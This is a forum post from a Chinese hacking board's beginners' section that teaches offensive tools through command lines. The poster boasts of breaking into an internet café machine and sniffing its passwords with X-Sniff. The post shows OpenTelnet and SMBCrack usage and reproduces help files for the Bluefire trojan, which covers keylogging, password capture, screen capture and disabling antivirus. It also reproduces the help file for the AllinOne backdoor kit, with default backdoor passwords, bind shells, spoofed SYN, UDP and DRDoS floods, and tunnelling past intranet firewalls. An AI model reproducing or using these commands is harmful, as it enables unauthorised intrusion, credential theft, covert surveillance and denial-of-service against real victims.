论坛: 菜鸟乐园 标题: /8-)/:?看这个比看什么都好 复制本贴地址    
作者: songsje302 [songsje302]    论坛用户   登录
后门类的有:
Hall    hacktelnet    BackDoor    Rmistaller
  winshell    蓝火 

Win2000/NT密码破解类的有:
SMBCrack
扫描类的就没什么讲的了都是有用户界面的。只要输入对方的ip进行扫描就行了。

生成字典类也比较简单也有界面,他会要你选择用什么生成字典是纯数字呢?还是字母等等。

嗅探类的我挑X-Sniff来说:

X-Sniff可捕获局域网内FTP/SMTP/POP3/HTTP协议密码。

运行参数说明:

  xsniff <选项>
 
  <选项>含义如下:
    -tcp          : 输出TCP数据报
    -udp          : 输出UDP数据报
    -icmp          : 输出ICMP数据报
    -pass          : 过滤密码信息
    -hide          : 后台运行
    -host          : 解析主机名
    -addr <IP地址> : 过滤IP地址
    -port <端口>  : 过滤端口
    -log <文件名>  : 将输出保存到文件
    -asc          : 以ASCII形式输出
    -hex          : 以16进制形式输出

比如:

我入侵了xx网吧的Host(这时已经telnet上去了,哈哈!爽啊~~HOHOHO!),输入:

c:\xsniff.exe -hide -pass -log c:\winnt\pass.log

这句话的意思是监听所有通过这台主机的密码(哈哈!比不一会什么邮箱账号,游戏账号一大把啊)。并把截获到的密码放在c:\winnt目录下的password文件中!
键盘纪录的我比较喜欢用广外幽灵,他操作简单只要现在要纪录键盘的文件就行了。

代理的代理猎手是进行大面积的扫描代理只要输入IP范围就ok了!

后门类的我说说hacktelnet他有2个文件分别是OpenTelnet,ResumeTelnet。

OpenTelnet是用来打开对方的telnet只有知道了对方的用户名和密码还有存在空连接就可以这样使用:

OpenTelnet.exe \\IP <帐号> <密码> <NTLM认证方式> <Telnet端口>

<NTLM认证方式>:
0: 不使用 NTLM 身份验证。
1: 先尝试 NTLM 身份验证。如果失败,再使用用户名和密码。
2: 只使用 NTLM 身份验证。

(假设IP为192.168.1.1,用户名为admin,密码是:123456)

c:\opentelnet \\192.168.1.1 admin 123456 1 9000

这样我们就可以:

c:\telnet 192.168.1.1 9000

如果对方的密码为空可以这样:

c:\opentelnet \\192.168.1.1 admin "" 1 9000

另外那个ResumeTelnet是用来恢复Telnet配置的,并关闭Telnet服务器,它的用法:

ResumeTelnet.exe \\ip <帐号> <密码>

例如:

c:\resumetelnet \\192.168.1.1 admin 123456

这下就可以了!

另外附带一下hall和蓝火的帮助文件。感兴趣的可以看看。
蓝色火焰0.5 Preview 2版帮助文档
                  ==================================

●注意:从本版本开始,蓝色火焰的服务端由配置器生成!!!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^●使用本控制程序的基本条件是
------有机器被你控制了,也就是说有机器被你装上了蓝色火焰服务端(由配置器生成的)!

接下来,喜欢上bbs或者mud的朋友就容易得多了,你把那台机当成一个bbs或者mud就可以了,只是要注意:端口是19191
简单点也行,跟着我来吧:
你要做的很简单,就是打开windows(不一定哦) 开始菜单->运行->输入telnet xxx.xxx.xxx.xxx 19191
这里xxx.xxx.xxx.xxx是你控制那台机的IP地址,怎么知道?$@#%#-----别问我哦,我也不知道哦。
端口是固定的19191,如果连上(也就是你可以为所欲为的),你就会看到如下画面:


***************“蓝色火焰”服务器端.***************
*************** 版本: V 0.5 Preview 2…… *************
*************** Copyright by Vinsa,2001.10******


Bluefire->
这是蓝色火焰的提示符,本程式需要在这个提示符下输入命令,以达到远程控制目的


======================================== 


命令详解帮助 :

1 help 显示简要帮助信息
2 exit 退出当前连接
3 ver 显示版本信息
4 list 列出当前进程
5 passwd 列出记录的密码信息
6 clearpw 清空记录的密码信息
7 sysinfo 列出计算机的详细信息
8 halt 挂起
9 screen 运行屏幕保护程序
10 sice? 检测是否运行了Soft-ice如果有就……
11 force 注销当前用户
12 logoff 注销
13 shutdown 关机
14 reboot 重启
15 poweroff 强行关机
----------------------------------------------------------
16 kill [Process ID]
杀死进程,格式如kill fffec309 其中fffec309是进程号,可以用list命令得到
----------------------------------------------------------
17 hide [desktop/taskbar/start/trayicon/clock]
隐藏……,如
隐藏桌面: hide desktop
隐藏任务栏: hide taskbar
隐藏开始按钮: hide start
隐藏右下角图标: hide trayicon
隐藏时钟: hide clock
----------------------------------------------------------
18 show [desktop/taskbar/start/trayicon/clock]
显示……
对应上面 ……
----------------------------------------------------------
19 disable [mouse/desktop/task/taskbar/start/cad]
锁定……
锁定鼠标: disable mouse
锁定桌面: disable desktop
锁定任务栏:disable task
锁定开始按钮:disable start
锁定Ctrl+Alt+delete: disable cad
----------------------------------------------------------
20 enabled [mouse/desktop/task/taskbar/start/cad]
把上面锁定的解锁
----------------------------------------------------------
21 open [monitor/driver/ftp/http [dir]]
打开……
打开显示器: open monitor
打开光驱: open driver
打开Ftp服务器:
open ftp
打开后就可以用各种ftp客户端控制,
比如cuteFtp,leechftp,甚至Flashget的站点资源探素器都可以进行浏览和文件管理
打开http服务器:
open http c:\windows
这样表示以c:\windows为主目录进行web发布,
当然可以用IE,Netscape,Opera等等浏览器进行访问和下载文件
★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★

蓝色火焰0.4特色功能:

这一功能充满着幻想,用虚拟Web页的形式
实现了用 浏览器(IE,Netscape,Opera等):察看系统信息,察看(/清空)捕获的密码,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^看(/清空)纪录的键盘,捕获屏幕,进程管理(列出/杀死进程),关闭计算机等功能
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
相当于由一般的TCP/IP协议控制的木马转变成用http协议控制超级木马,可以绕过一些防火墙,呵呵
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^要open http 然后 http://xxx.xxx.xxx.xxx就会出现控制选单!!! 然后一切都这么简单!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★    
也可以直接浏览捕获的屏幕图像
---------------------------------------
22 close [monitor/driver/ftp/http]
关闭……
对应上面的
---------------------------------------
23 catch [Jpeg Filename]
捕获当前屏幕
如 catch c:\screen.jpg
然后可以open http c: 打开http服务器,
在IE的地址栏里输入 http://XXX.XXX.XXX.XXX/screen.jpg就可以浏览到屏幕图像
^^^^^^^^^^^^^^^
这些表示对方机器的IP地址

open http
打开IE输入 http://xxx.xxx.xxx.xxx
选择抓取屏幕就ok了
---------------------------------------
24 changeb [on/off]
交换鼠标左右键changeb on
还原鼠标左右键changeb off
---------------------------------------25 charspy [result/on/off]
查看击键记录:charspy result
禁止键盘记录:charspy off
开启键盘记录:charspy on (注意默认情况下已经开启)
(记录各种按键,结果不存盘)
---------------------------------------26 keyspy [result/on/off/clear]
查看击键记录:keyspy result
禁止键盘记录:keyspy off
开启键盘记录:keyspy on (注意默认情况下已经开启)
清空键盘纪录:keyspy clear
(这里和上面不同的是这里可以记录中文输入,并将结果存盘)
------------------------------------- snapexe 设置EXE文件关连
28 unsnapexe 解除EXE文件关连
---------------------------------------29 bladd [filename]/blview/blclear
黑名单管理(在关连了exe文件后黑名单生效)
将程序加入黑名单用法:
bladd regedit(禁用注册表编辑器)
bladd skynet (禁用天网)
bladd msconfig
bladd qq2000 (这个太狠了,禁用oicq)
bladd windows(禁用windows目录下所有东西)
bladd ………………………………自己想加什么就加什么,看XXX不爽就bladd XXX

查看当前黑名单�bblview
清空当前黑名单 blclear
--------------------------------------
30 recstart[wav filename]/recstop/recstate
开始录制一段声音: recstart c:\test.wav
结束录制 : recstop
显示录音机当前状态 : recstate
------------------------------------
31 cmd [dos command line]
运行dos命令:如
cmd dir
cmd type c:\test.txt
cmd del c:\msdos.sys(呵呵,这个删掉就麻烦了)
---------------------------------------
32 run [filename]
运行命令 如:
run c:\test.wav
run c:\windows\system\msconfig.exe
run c:\screen.jpg
--------------------------------------
33 chat [messages you want to send]
打开聊天窗口和被控机聊天
用法很简单,如:
chat 你好
chat 你被我控制了
chat 你好可怜那
chat # (这个表示关闭聊天窗口)
--------------------------------------4 changetelnetport [port]
远程修改telnet端口
用法如 changetelnetport 23
表示把telnet端口修改为 23
服务端重启(restart)后生效
----------------------------------------------------------
35 changeftpport [port]
远程修改ftp端口
用法如 changeftpport 21
表示把ftp端口修改为 21
服务端重启(restart)后生效

-------------------------------------
36 changehttpport [port]
远程修改http端口
用法如 changehttpport 80
表示把http端口修改为 80
服务端重启(restart)后生效

--------------------------------------
37 changepasswd [new password]
远程修改telnet密码
用法如 changepasswd 123456
表示把telnet密码修改为 123456
服务端重启(restart)后生效

------------------------------------
38 viewsetup
远程察看当前配置
-------------------------------------
39 restart
远程重启bluefire服务端,使修改的设置生效

====================================

V0.5 Preview 2 版 快捷命令列表:

l = list
k = kill
h = hide
s = show
c = catch
d = disable
e = enabled
! = cmd
r = run
: = chat
pw = passwd
cpw = clearpw
si = sysinfo
ks = keyspy
cs = chatspy
ks r = keyspy result
ks c = keyspy clear
cs r= charspy result 
ctp = changetelnetport
cfp = changeftpport
chp = changehttpport
cpp = changepasswd

=======================================
AllinOne V0.4 for Win2000 使用说明书.
by lion.

======================================
d:\>dir HAll.exe
驱动器 D 中的卷没有标签。
卷的序列号是 8084-DE58

d:\ 的目录

2002-05-10  17:53              62,976 HAll.exe
              1 个文件        62,976 字节
              0 个目录    619,315,200 可用字节

d:\>HAll -h
======================= HUC AllinOne V0.40 for Win2000
= By Lion, Welcome to  http://www.cnhonker.net =================

[BackDoor:]
  -start
  -bind <Password> <ListenPort>
  -setup [<TargetIP> <User> <Pass>] <ServiceName>
<DisplayName> <Description> <Password> <ListenPort>
<PackSize>
[Files:]
  -<fget|safedel> <option>
[Flood:]
  -<ping|udp|syn|drdos> <option>
[Process:]
  -<fport|pslist|pskill <Pid>>
[System:]
  -<reboot|shutdown|power>
[Scanner:]
  -<xport|xcgi> <option>
[Services:]
  -<slist|sdel|sstart|sstop|spause|sview|install> <option>
[Transmit:]
  -<listen|tran|slave> <option>


/////////////////////////////////////////
AllinOne 0.3功能介绍
--------------------------------------------------------------------------------
1.Ping Backdoor(后门).
[BackDoor:]


1.1 本机默认安装一个ping backdoor.
-start
默认数据为:
密码为: kissme:)
监听包大小: 101
后门端口为: 138

1.2 本机开一个绑定了cmd shell的端口.
-bind <Password> <ListenPort>
<Password> 为验证密码.
<ListemPort> 为监听端口.

1.3 指定后门参数安装后门.
-setup [<TargetIP> <User> <Pass>] <ServiceName>
<DisplayName> <Description> <Password> <ListenPort>
<PackSize>
<ServerName> 为后门的服务名.
        <DisplayName> 为服务显示的名称.
<Description> 为服务的描述.
<Password> 为控制密码.
<ListenPort> 为监听端口,为(1-65535).
<PackSize> 为监听包的大小,为(1-65000).
[<TargetIP> <User> <Pass>] 为远程安装选项,分别指定远程IP,用户名和密码.(必须为administrator).

1.4 ping 后门的使用方法为:
ping TargetIP -l 101 -n 1
telnet TargetIP 138
其中的101,138分别改成你设定的参数.

--------------------------------------------------------------------------------
2. 文件操作.
[Files:]

-<fget|safedel> <option>

2.1 下载Http或FTP文件功能.
-fget <URLFile|FTPFile> <LocalFile>
<URLFile> 为文件的Http地址.
<FTPFile> 为文件的FTP地址.
<LocalFile> 为下载文件要保存的路径和文件名.

2.2 安全擦除文件和目录功能.(从硬盘完全擦除)
-safedel [-p passes] [-s] <File or Directory>
-safedel [-p passes] -z [Drive Letter]
[Opation:]
  -p passes  重写的次数, 默认为:3
  -s        擦掉所有子目录.
  -z        清除

--------------------------------------------------------------------------------
3.DoS & Flood 功能.
[Flood:]

-<ping|udp|syn|drdos> <option>

3.1 Ping Flood (为伪造源IP进行ICMP Ping 洪水攻击.)
-ping <SourceIP> <TargetIP> <PackSize> <Delay>
<SourceIP> 为要伪造的源IP,也就是将要攻击的IP.
<TargetIP> 为将要利用的主机IP, 最好为一个广播地址.如192.168.0.255
<Packsize> 为发送的ICMP包的大小.为(1-65000)
<Delay> 为发送数据包之间的延时.为(0-1000), 选0为无延时,推荐为1.
因为收到一个ICMP请求一般的主机都会返回一个回应.
如果一个广播地址192.168.0.255上有50台主机有ICMP回应,
-ping 192.168.1.1 192.168.0.255 60000 1
将使192.168.1.1主机收到 6000 x 50倍的数据包.:)

3.2 UDP Flood.(为伪造源IP和源端口,对目标进行UDP洪水攻击.)
-udp <SourceIP> <SourcePort> <TargetIP> <TargetPort>
<PackSize> <Delay>
<SourceIP> 为要伪造的源IP.
<SourcePort> 为要伪造的源端口. 为(0-65535),选0表示为每次攻击时变化源端口.
<TargetIP> 为将要攻击的主机IP.
<TargetPort> 为将要攻击的主机的端口, 为(0-65535),选0表示为每次攻击时变化目标端口.
<Packsize> 为发送的UDP包的大小.为(1-65400)
<Delay> 为发送数据包之间的延时.为(0-1000),选0为无延时, 推荐为1.

3.3 SYN Flood.(为伪造源IP和端口,对目标进行SYN 连接请求攻击.)
-syn <SourceIP> <SourcePort> <TargetIP> <TargetPort>
<SourceIP> 为要伪造的源IP.(可找任意互联网IP, 攻击中会在一个B段内变化)
<SourcePort> 为要伪造的源端口.为(0-65535).(可随便输入,攻击中会自动变化)
<TargetIP> 为将要攻击的主机的IP.
<TargetPort> 为将要攻击的主机的端口,比如80,21等.
原理为改变源地址和源端口, 发送大量的syn连接请求到目标IP,产生拒绝服务现象.
攻击能力大约为1.5W次连接请求/s(未优化版).

3.4 DRDoS Flood.(为分布式反射拒绝服务攻击.) ---其实是没多大利用价值.不过看见有人讨论,就写了一个.
-drdos <TargetIP> <TargetPort> <UsingIP> <UsingPort>
<TargetIP> 为将要攻击的主机的IP.
<SourcePort> 为将要攻击的主机的端口.
<UsingIP> 为将要利用的主机段.(找一个C段内主机存活并开放特定端口多网段的,攻击时,这个IP将自动在2个C内变化.)
<UsingPort> 为将要利用的端口.如21,80,179等等.
drdos 为利用发出的的syn连接请求到一批活动的主机的开放端口, 也就是源地址是不变的,
利用活动主机返回的信息来淹没源地址IP,产生flood效果.

3.5
ICMP 和UDP 实际上是个比带宽的攻击方式.
参与攻击的机器少的情况下, -syn 更容易让目标瘫痪.
参与攻击的机器多的情况下, -drdos 让目标更难防御flood攻击.

--------------------------------------------------------------------------------
4. 进程操作.
[Process:]

-<fport|pslist|pskill <Pid>>

4.1 查看端口跟进程的对应关系.并找出进程的文件的具体位置.(fport)
-fport

4.2 查看当前进程列表.
-pslist

4.3 杀掉指定进程号的进程.
-pskill <Pid>
<Pid> 为要杀掉的进程号,可以用pslist功能来查看具体的pid.

--------------------------------------------------------------------------------
5. 系统功能
[System:]

-<reboot|shutdown|power>

5.1 重启机器
-reboot
为立刻重启动机器.

5.2 关机.
-shutdown
为立刻关机.

5.3 关闭电源.
-power
为立刻关机, 并关电源.

--------------------------------------------------------------------------------
6. 扫描器功能.(由于Hscan 0.32源代码丢失,暂时只有扫描端口(-xport)功能完成.由Hscan 改进而来,端口扫描速度提高4倍以上.)
[Scanner:]

-<xport|xcgi> [option]

6.1 端口扫描.(扫描目标机器开放的端口.)
-xport <HostName|StartIP[-EndIP]> [Port1-Port2|Port1,Port2...] [Option]
[Opation:]
-b        取服务器返回信息.
-d:delay  扫描延时,为(1-30),默认为 2s, 最大为60s.
-t:thread  扫描的线程,为(1-1000),默认为200, 最大为1000.
<HostName> 为要扫描的主机名.
<StartIP[-EndIP]> 为要扫描的主机IP或IP段.
[Port1-Port2] 为要扫描的端口范围.
[Port1,Port2...] 为要扫描的端口列表.
如果没有端口信息,将默认扫描内置的32个端口.分别为:
21,22,23,25,53,79,80,110,111,113,123,135,139,143,443,445,
512,513,514,515,540,
1080,1433,1521,1524,3306,3389,5631,6000,8000,8080,12345

6.2 CGI漏洞扫描.
-xcgi <HostName|StartIP[-EndIP]> [option]
[Options:]
  -d:delay        扫描延时, 默认为4秒,最大为60秒.依网速而定.
  -f:file        CGI漏洞列表文件,如果文件不存在或者未指定,将扫描内置的1319个CGI漏洞列表.
  -p:port        要扫描的WEB端口.
  -g:post        用POST模式代替GET.
  -t:thread      扫描进程,默认为100,最大为500.
  -u:url          扫描单个URL.


--------------------------------------------------------------------------------
7. 服务操作.
[Services:]

-<slist|sdel|sstart|sstop|spause|sview|install> <option>

7.1 为列出本机或远程主机的服务.
-slist [<TargetIP> <User> <Pass>]
all|running|win32|driver>
<all> 为列出所有服务.
<running> 为列出所有运行中的服务.
<win32>和<driver> 分别为要列出的服务的类型.
[<TargetIP> <User> <Pass>] 为远程查看服务选项,分别指定远程IP,用户名和密码.(必须为administrator).

7.2 删除一个本机或远程主机的服务.
-sdel [<TargetIP> <User> <Pass>] <ServiceName>
<ServiceName> 为将要删除的服务名.
[<TargetIP> <User> <Pass>] 同上.

7.3 启动一个本机或远程主机的服务.
-sstart [<TargetIP> <User> <Pass>] <ServiceName>
<ServiceName> 为将要启动的服务名.
[<TargetIP> <User> <Pass>] 同上.

7.4 停止一个本机或者远程主机的服务.
-sstop [<TargetIP> <User> <Pass>] <ServiceName>
<ServiceName> 为将要停止的服务名.
[<TargetIP> <User> <Pass>]  同上.

7.5 暂停一个本机或者远程主机的服务.
-spause [<TargetIP> <User> <Pass>] <ServiceName>
<ServiceName> 为将要暂停的服务名.
[<TargetIP> <User> <Pass>]  同上.

7.6 查看一个本机或远程主机的服务的详细信息.
-sview [<TargetIP> <User> <Pass>] <ServiceName>
<ServiceName> 为将要查看的服务名.
[<TargetIP> <User> <Pass>]  同上.

7.7 为本机或者远程主机安装一个服务.
-install [<TargetIP> <User> <Pass>]
<ServiceName> <DisplayName>
<FilePath>
为本机或远程主机安装一个服务.
<ServiceName> 为将要安装的服务名称.
<DisplayName> 为将要安装的服务的显示名称.
<FilePath> 为作为服务运行的程序.(必须是服务程序)

--------------------------------------------------------------------------------
8. TCP包转发功能.
[Transmit:]

8.1 为监听两个端口,把两个端口上接收到的数据做一个交换.
-listen <ListenPort> <AttackerPort>
一个端口等待 slave来连接,
一个等待攻击者来连接.
如果两边都有连接进来,把两边的数据做一个交换.
即 ListenPort <-> AttackerPort

8.2 为普通包转发功能,把本机的的某个端口上接收到的数据转发到指定IP的端口上.
-tran  <ListenPort> <DestIP> <DestPort>
即ListenPort <-> DestIP->DestPort
<ListenPort> 为监听的端口
<DestIP> 为你实际要连接的目标的IP.
<DestPort> 为你实际要连接的目标的端口.
如:
-tran 23 192.168.0.1 23
把本机的23端口上接收到的数据转发到192.168.0.1的23端口,并把192.168.0.1的23端的返回信息转回个连接本机23端的IP.
telnet localhost 23 实际上连接的是192.168.0.1的23端口.

8.3 为连接目标IP(TargetIP)的端口(TargetPort), 并连接另一个主机的监听端口.
-slave  <TargetIP> <TargetPort> <ListenIP> <ListenPort>
为连接目标IP(TargetIP)的端口(TargetPort), 并连接另一个主机的监听端口, 并把两边的数据作一个交换.

3种方法结合,理论上可以突破任意一种连上互联网的内网.


最后来说说SMBCrack它是小榕写的速度很快

它的语法是:

smbcrack <ip> <用户名> <字典文件的路径> [端口]


地主 发表时间: 05-01-10 13:11

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号